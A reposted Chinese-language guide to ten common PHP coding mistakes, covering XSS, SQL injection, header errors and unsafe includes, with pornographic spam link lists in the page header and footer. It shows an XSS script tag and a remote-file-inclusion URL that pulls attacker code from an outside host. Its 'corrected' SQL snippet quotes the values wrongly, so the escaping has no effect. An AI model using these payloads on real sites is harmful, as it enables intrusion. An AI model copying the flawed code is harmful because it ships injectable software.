天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

PHP程序員編程注意事項

1.不轉意html entities 
  一個基本的常識:所有不可信任的輸入(特別是用戶從form中提交的數據) ,輸出之前都要轉意。 echo $_GET['usename'] ;
這個例子有可能輸出:
<script>/*更改admin密碼的腳本或設置cookie的腳本*/</script>
這是一個明顯的安全隱患,除非你保證你的用戶都正確的輸入。
如何修復 :
我們需要將"< ",">","and" 等轉換成正確的HTML表示(< , >', and "),函數htmlspecialchars 和 htmlentities()正是干這個活的。
正確的方法: 
復制代碼 代碼如下:
echo htmlspecialchars($_GET['username'], ENT_QUOTES); 


2. 不轉意SQL輸入
我曾經在一篇文章中最簡單的防止sql注入的方法(php+mysql中)討論過這個問題并給出了一個簡單的方法 。有人對我說,他們已經在php.ini中將magic_quotes設置為On,所以不必擔心這個問題,但是不是所有的輸入都是從$_GET, $_POST或 $_COOKIE中的得到的!
如何修復:

和在最簡單的防止sql注入的方法(php+mysql中)中一樣我還是推薦使用mysql_real_escape_string()函數 正確做法:
復制代碼 代碼如下:
<?php 
$sql = "Update users SET 
name='.mysql_real_escape_string($name).' 
Where id='.mysql_real_escape_string ($id).'"; 
mysql_query($sql); 
?> 


3.錯誤的使用HTTP-header 相關的函數: header(), session_start(), setcookie()
遇到過這個警告嗎?"warning: Cannot add header information - headers already sent [....]

每次從服務器下載一個網頁的時候,服務器的輸出都分成兩個部分:頭部和正文。
頭部包含了一些非可視的數據,例如cookie。頭部總是先到達。正文部分包括可視的html,圖片等數據。
如果output_buffering設置為Off,所有的HTTP-header相關的函數必須在有輸出之前調用。問題在于你在一個環境中開發,而在部署到另一個環境中去的時候,output_buffering的設置可能不一樣。結果轉向停止了,cookie和session都沒有正確的設置........。

如何修復:
確保在輸出之前調用http-header相關的函數,并且令output_buffering = Off


4. Require 或 include 的文件使用不安全的數據
再次強調:不要相信不是你自己顯式聲明的數據。不要 Include 或 require 從$_GET, $_POST 或 $_COOKIE 中得到的文件。

例如:
index.php
復制代碼 代碼如下:
<? 
//including header, config, database connection, etc 
include($_GET['filename']); 
//including footer 
?> 


現在任一個黑客現在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
來獲取你的機密信息,或執行一個php腳本。 
如果allow_url_fopen=On,你更是死定了:
試試這個輸入:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php
現在你的網頁中包含了http://www.youaredoomed.com/phphack.php的輸出. 黑客可以發送垃圾郵件,改變密碼,刪除文件等等。只要你能想得到。
如何修復:
你必須自己控制哪些文件可以包含在的include或require指令中。

下面是一個快速但不全面的解決方法:
復制代碼 代碼如下:
<? 
//Include only files that are allowed. 
$allowedFiles = array('file1.txt','file2.txt','file3.txt'); 
if(in_array((string)$_GET['filename'],$allowedFiles)) { 
include($_GET['filename']); 

else{ 
exit('not allowed'); 

?> 



5. 語法錯誤
語法錯誤包括所有的詞法和語法錯誤,太常見了,以至于我不得不在這里列出。解決辦法就是認真學習php的語法,仔細一點不要漏掉一個括號,大括號,分號,引號。還有就是換個好的編輯器,就不要用記事本了!

6.很少使用或不用面向對象
很多的項目都沒有使用php的面向對象技術,結果就是代碼的維護變得非常耗時耗力。php支持的面向對象技術越來越多,越來越好,我們沒有理由不使用面向對象。

7. 不使用framework
95% 的php項目都在做同樣的四件事: Create, edit, list 和delete. 現在有很多MVC的框架來幫我們完成這四件事,我們為何不使用他們呢?

8. 不知道php中已經有的功能
php的核心包含很多功能。很多程序員重復的發明輪子。浪費了大量時間。編碼之前搜索一下php mamual,在google上檢索一下,也許會有新的發現!php中的exec()是一個強大的函數,可以執行cmd shell,并把執行結果的最后一行以字符串的形式返回。考慮到安全可以使用EscapeShellCmd() 

9.使用舊版本的php

很多程序員還在使用php4,在php4上開發不能充分發揮php的潛能,還存在一些安全的隱患。轉到php5上來吧,并不費很多功夫。大部分php4程序只要改動很少的語句甚至無需改動就可以遷移到php5上來。根據http://www.nexen.NET的調查 只有12%的php服務器使用php5,所以有88%的php開發者還在使用php4.

10.對引號做兩次轉意

見過網頁中出現/'或/'"嗎?這通常是因為在開發者的環境中magic_quotes 設置為off,而在部署的服務器上magic_quotes =on. php會在 GET, POST 和 COOKIE中的數據上重復運行addslashes() 。
原始文本:
It's a string

magic quotes on :
It/'s a string
又運行一次
addslashes():
It//'s a string

HTML輸出:
It/'s a string

還有一種情況就是,用戶一開始輸入了錯誤的登錄信息,服務器檢測到錯誤輸入后,輸出同樣的form要求用戶再次輸入,導致用戶的輸入轉意兩次!

php技術PHP程序員編程注意事項,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 翁熄性放纵交换300章 | 国产免费人成在线视频有码 | 欧美做真爱欧免费看 | 成年女人免费播放影院 | 美女医生深夜在家裸睡惨死 | 啦啦啦WWW在线观看免费高清版 | 黄A无码片内射无码视频 | 翁熄性放纵交换01 | 伊人久久国产 | 国产91网站在线观看免费 | 甜性涩爱快播 | 国产成人久久精品AV | 麻花传媒MD0044视频 | 亚洲性无码av在线 | WWW亚洲精品久久久乳 | 性与肉体电影免费观看 | 日本高清不卡一区久久精品 | a视频在线免费观看 | 先锋影音av资源站av | 久久欧洲AV无码精品色午夜麻豆 | 动漫美女和男人下载 | 99爱在线观看精品视频 | 色青青草原桃花久久综合 | 秋霞最新高清无码鲁丝片 | 中文字幕亚洲无线码高清不卡 | 极品美女久久久久久久久久久 | 欧美成人momandson | 国产精品久久人妻无码蜜 | 黄色三级三级三级免费看 | 午夜日韩久久影院 | 欧美性情一线免费http | 国内偷拍夫妻av | 灌饱娇嫩H将军公主最新章节 | 亚洲视频在线观看视频 | 欧美Av无码高清在线 | 学校捏奶揉下面污文h | 亚洲视频在线观看 | 正能量不良WWW免费窗口 | 日韩欧美一区二区三区免费观看 | 日本无码人妻丰满熟妇5G影院 | 又黄又爽又无遮挡在线观看免费 |